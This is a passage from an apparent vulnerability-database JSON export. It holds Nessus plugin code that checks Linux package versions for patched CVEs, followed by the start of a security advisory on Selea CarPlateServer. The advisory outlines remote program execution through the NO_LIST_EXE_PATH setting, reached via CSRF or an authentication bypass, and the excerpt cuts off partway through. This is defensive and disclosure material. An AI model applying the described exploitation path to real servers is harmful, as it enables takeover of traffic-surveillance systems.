flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plpython-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plpython-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-pltcl-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-pltcl-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-devel-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-devel-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-test-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpq5-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpq5-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.10\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-test-13.1-5.3.15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql13\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T10:34:03", "description": "Backport fixes for CVE-2020-35653, CVE-2020-35654, CVE-2020-35655.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : mingw-python-pillow / python-pillow (2021-a8ddc1ce70)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35654", "CVE-2020-35655", "CVE-2020-35653"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-pillow", "p-cpe:/a:fedoraproject:fedora:mingw-python-pillow", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2021-A8DDC1CE70.NASL", "href": "https://www.tenable.com/plugins/nessus/145235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-a8ddc1ce70.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145235);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-35653\", \"CVE-2020-35654\", \"CVE-2020-35655\");\n script_xref(name:\"FEDORA\", value:\"2021-a8ddc1ce70\");\n\n script_name(english:\"Fedora 33 : mingw-python-pillow / python-pillow (2021-a8ddc1ce70)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Backport fixes for CVE-2020-35653, CVE-2020-35654, CVE-2020-35655.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-a8ddc1ce70\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected mingw-python-pillow and / or python-pillow\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"mingw-python-pillow-7.2.0-3.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"python-pillow-7.2.0-3.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-python-pillow / python-pillow\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-22T10:34:00", "description": " - wavpack-5.4.0 is available\n\n - CVE-2020-35738 wavpack: out-of-bounds write in\n WavpackPackSamples function in pack_utils.c [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 6.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : wavpack (2021-5c83efb61c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35738"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:wavpack"], "id": "FEDORA_2021-5C83EFB61C.NASL", "href": "https://www.tenable.com/plugins/nessus/145240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-5c83efb61c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145240);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-35738\");\n script_xref(name:\"FEDORA\", value:\"2021-5c83efb61c\");\n\n script_name(english:\"Fedora 33 : wavpack (2021-5c83efb61c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\" - wavpack-5.4.0 is available\n\n - CVE-2020-35738 wavpack: out-of-bounds write in\n WavpackPackSamples function in pack_utils.c [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-5c83efb61c\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected wavpack package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wavpack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"wavpack-5.4.0-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wavpack\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-22T09:38:35", "description": "rfc822.c in Mutt through 2.0.4 allows remote attackers to cause a\ndenial of service (mailbox unavailability) by sending email messages\nwith sequences of semicolon characters in RFC822 address fields (aka\nterminators of empty groups).\n\nA small email message from the attacker can cause large memory\nconsumption, and the victim may then be unable to see email messages\nfrom other persons.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.7.2-1+deb9u5.\n\nWe recommend that you upgrade your mutt packages.\n\nFor the detailed security status of mutt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/mutt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 1, "cvss3": {}, "published": "2021-01-21T00:00:00", "title": "Debian DLA-2529-1 : mutt security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3181"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mutt", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2529.NASL", "href": "https://www.tenable.com/plugins/nessus/145237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2529-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145237);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2021-3181\");\n\n script_name(english:\"Debian DLA-2529-1 : mutt security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"rfc822.c in Mutt through 2.0.4 allows remote attackers to cause a\ndenial of service (mailbox unavailability) by sending email messages\nwith sequences of semicolon characters in RFC822 address fields (aka\nterminators of empty groups).\n\nA small email message from the attacker can cause large memory\nconsumption, and the victim may then be unable to see email messages\nfrom other persons.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.7.2-1+deb9u5.\n\nWe recommend that you upgrade your mutt packages.\n\nFor the detailed security status of mutt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/mutt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/01/msg00017.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/mutt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/mutt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected mutt package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mutt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"mutt\", reference:\"1.7.2-1+deb9u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T10:34:01", "description": "[Dnspooq](https://www.jsof-tech.com/disclosures/dnspooq/) security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : dnsmasq (2021-84440e87ba)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25684", "CVE-2020-25687", "CVE-2020-25685", "CVE-2020-25681", "CVE-2020-25683", "CVE-2020-25682", "CVE-2020-25686"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dnsmasq", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2021-84440E87BA.NASL", "href": "https://www.tenable.com/plugins/nessus/145241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-84440e87ba.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145241);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25681\", \"CVE-2020-25682\", \"CVE-2020-25683\", \"CVE-2020-25684\", \"CVE-2020-25685\", \"CVE-2020-25686\", \"CVE-2020-25687\");\n script_xref(name:\"FEDORA\", value:\"2021-84440e87ba\");\n\n script_name(english:\"Fedora 33 : dnsmasq (2021-84440e87ba)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"[Dnspooq](https://www.jsof-tech.com/disclosures/dnspooq/) security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-84440e87ba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.jsof-tech.com/disclosures/dnspooq/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected dnsmasq package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"dnsmasq-2.83-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T10:33:59", "description": "Rebase to 1.9.5p1\n\n - updated sudo url Resolves: rhbz#1902758\n\n - enabled python plugin as a subpackage Resolves:\n rhbz#1909299\n\n - fixed double free in sss_to_sudoers Resolves:\n rhbz#1885874\n\n - fixed CVE-2021-23239 sudo: possible directory existence\n test due to race condition in sudoedit Resolves:\n rhbz#1915055\n\n - fixed CVE-2021-23240 sudo: symbolic link attack in\n SELinux-enabled sudoedit Resolves: rhbz#1915054\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 32 : sudo (2021-234d14bfcc)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23239", "CVE-2021-23240"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:sudo", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2021-234D14BFCC.NASL", "href": "https://www.tenable.com/plugins/nessus/145238", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-234d14bfcc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145238);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2021-23239\", \"CVE-2021-23240\");\n script_xref(name:\"FEDORA\", value:\"2021-234d14bfcc\");\n\n script_name(english:\"Fedora 32 : sudo (2021-234d14bfcc)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Rebase to 1.9.5p1\n\n - updated sudo url Resolves: rhbz#1902758\n\n - enabled python plugin as a subpackage Resolves:\n rhbz#1909299\n\n - fixed double free in sss_to_sudoers Resolves:\n rhbz#1885874\n\n - fixed CVE-2021-23239 sudo: possible directory existence\n test due to race condition in sudoedit Resolves:\n rhbz#1915055\n\n - fixed CVE-2021-23240 sudo: symbolic link attack in\n SELinux-enabled sudoedit Resolves: rhbz#1915054\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-234d14bfcc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"sudo-1.9.5p1-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "zeroscience": [{"lastseen": "2021-01-22T01:27:27", "description": "Title: Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution \nAdvisory ID: [ZSL-2021-5622](<ZSL-2021-5622.php>) \nType: Local/Remote \nImpact: System Access, Cross-Site Scripting, Security Bypass, DoS \nRisk: (4/5) \nRelease Date: 21.01.2021 \n\n\n##### Summary\n\nOur CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. \n\n##### Description\n\nThe server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users. \n\n##### Vendor\n\nSelea s.r.l. - <https://www.selea.com>\n\n##### Affected Version\n\n4.0.1.6(210120) \n4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n\n##### Tested On\n\nMicrosoft Windows 10 Enterprise \nSeleaCPSHttpServer/1.1 \n\n##### Vendor Status\n\n[07.11.2020] Vulnerability discovered. \n[09.11.2020] Vendor 